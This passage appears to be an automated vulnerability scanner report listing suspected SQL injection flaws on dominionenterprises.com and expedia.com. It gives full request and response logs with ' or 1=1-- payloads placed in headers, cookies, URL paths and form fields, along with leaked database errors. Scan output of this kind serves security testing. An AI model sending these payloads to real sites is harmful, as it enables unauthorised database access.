Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:36:43 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=7498864a68df42f076f73d37ca5f499f; expires=Sun, 08 May 2011 19:36:43 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:36:43 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html


2.33. http://www.dominionenterprises.com/main/do/Careers [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 12491798'%20or%201%3d1--%20 and 12491798'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=12491798'%20or%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:29 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=50020d3c5d5f588a1b914a2e77bc27a7; expires=Sun, 08 May 2011 19:35:29 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:29 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=46792d7b37bb084f60dc2f6e1f256825516b4aa4839835dd4dc443829c5eca85df506b6d; Path=/
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Careers">
   <meta name="keywords" content="Careers">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines o
...[SNIP]...

Request 2

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=12491798'%20or%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:29 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=f73a685d8d2810e0713139115067fb17; expires=Sun, 08 May 2011 19:35:29 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:29 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Careers">
   <meta name="keywords" content="Careers">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/js
...[SNIP]...

2.34. http://www.dominionenterprises.com/main/do/Careers [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. The payloads 62583083'%20or%201%3d1--%20 and 62583083'%20or%201%3d2--%20 were each submitted in the s_cc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true62583083'%20or%201%3d1--%20; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:07 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=e2553f7484cb2c7783f3a5c243d53604; expires=Sun, 08 May 2011 19:35:07 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:07 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=1e404d829976e6f2f6bbfbc4ca9a68ff17a0fb93ea548b494dc443259c5eca85caf3474a; Path=/
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Careers">
   <meta name="keywords" content="Careers">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines o
...[SNIP]...

Request 2

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true62583083'%20or%201%3d2--%20; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:07 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=ecde5f56d9a309efc466b068f1ee9147; expires=Sun, 08 May 2011 19:35:07 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:07 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Careers">
   <meta name="keywords" content="Careers">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/js
...[SNIP]...

2.35. http://www.dominionenterprises.com/main/do/For_Businesses [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/For_Businesses

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16640137'%20or%201%3d1--%20 and 16640137'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/For_Businesses16640137'%20or%201%3d1--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/Advertiser_Agreement
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725152629:ss=1304725152629; s_nr=1304725175943; s_lv=1304725175944; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:58 GMT
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:37:58 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 32708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else
return false;
}
}
}
function IsMobileRedirection() {
var agent = navigator.userAgent.toLowerCase();
var IsMobile = false;
if ((agent.indexOf('absinthe') != -1) ||
(agent.indexOf('albacore') !
...[SNIP]...

Request 2

GET /main/do/For_Businesses16640137'%20or%201%3d2--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/Advertiser_Agreement
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725152629:ss=1304725152629; s_nr=1304725175943; s_lv=1304725175944; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:58 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:37:58 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html


2.36. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/businesses/id/13/category/For%20Businesses

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 48717636'%20or%201%3d1--%20 and 48717636'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/businesses48717636'%20or%201%3d1--%20/id/13/category/For%20Businesses HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/For_Businesses
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725177227:ss=1304725152629; s_nr=1304725179971; s_lv=1304725179971; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:38:52 GMT
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:38:52 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 32718

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else
return false;
}
}
}
function IsMobileRedirection() {
var agent = navigator.userAgent.toLowerCase();
var IsMobile = false;
if ((agent.indexOf('absinthe') != -1) ||
(agent.indexOf('albacore') !
...[SNIP]...

Request 2

GET /main/do/businesses48717636'%20or%201%3d2--%20/id/13/category/For%20Businesses HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/For_Businesses
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725177227:ss=1304725152629; s_nr=1304725179971; s_lv=1304725179971; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:38:52 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:38:52 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html


2.37. http://www.expedia.com/daily/common/moreinfo.asp [trl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /daily/common/moreinfo.asp

Issue detail

The trl parameter appears to be vulnerable to SQL injection attacks. The payload 89842498'%20or%201%3d1--%20 was submitted in the trl parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /daily/common/moreinfo.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0
Content-Length: 1023

BundleType=1&WT=Home&bFfstAB=&bFfstDefault=&bFfst=&FCity=Austin%2C+TX+%28AUS-Austin-Bergstrom+International+Airport%29&FTLA=AUS&TCity=Detroit%2C+MI+%28DTW-Wayne+County%29&TTLA=DTW&TCityId=&FDate=mm%2F
...[SNIP]...
rigName=&LsFlightDestTLA=&LsFlightDestName=&LsHotel=&LsAtlas=&LsAtlasRegionId=&LsFOverride=&LsTOverride=&taIndex=&taText=&taType=&taOn=1&srch=flt&typ=1&flx=on&fct=AUS&tct=DTW&mon=4-2011&trl=0%2C1%2C1089842498'%20or%201%3d1--%20&rad1=1&rse1=0&rch1=0

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 23:21:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX011D32290D$F4$B5202000$AE$28$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$CC$DD$EE$F5$E8$8C$9E$94$82$AB$89$FB!e02000`137; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819541`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 77907

<!-- srvpush1 16:21:24(:715) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<COMMENT ID=ERROR_TEXT TITLE="[MR43]: 37000 (200110): [Microsoft][ODBC SQL Server Driver][SQL Server]SP: FareCacheFareGetDepartureDateR. Parameter is invalid. Parameter: NightStayNbrMax; value: 0.">
...[SNIP]...

2.38. http://www.expedia.com/pub/agent.dll [rged parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The rged parameter appears to be vulnerable to SQL injection attacks. The payload 61613067%20or%201%3d1--%20 was submitted in the rged parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=1061613067%20or%201%3d1--%20&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:39:25 GMT
Connection: close
Connection: Transfer-Encoding
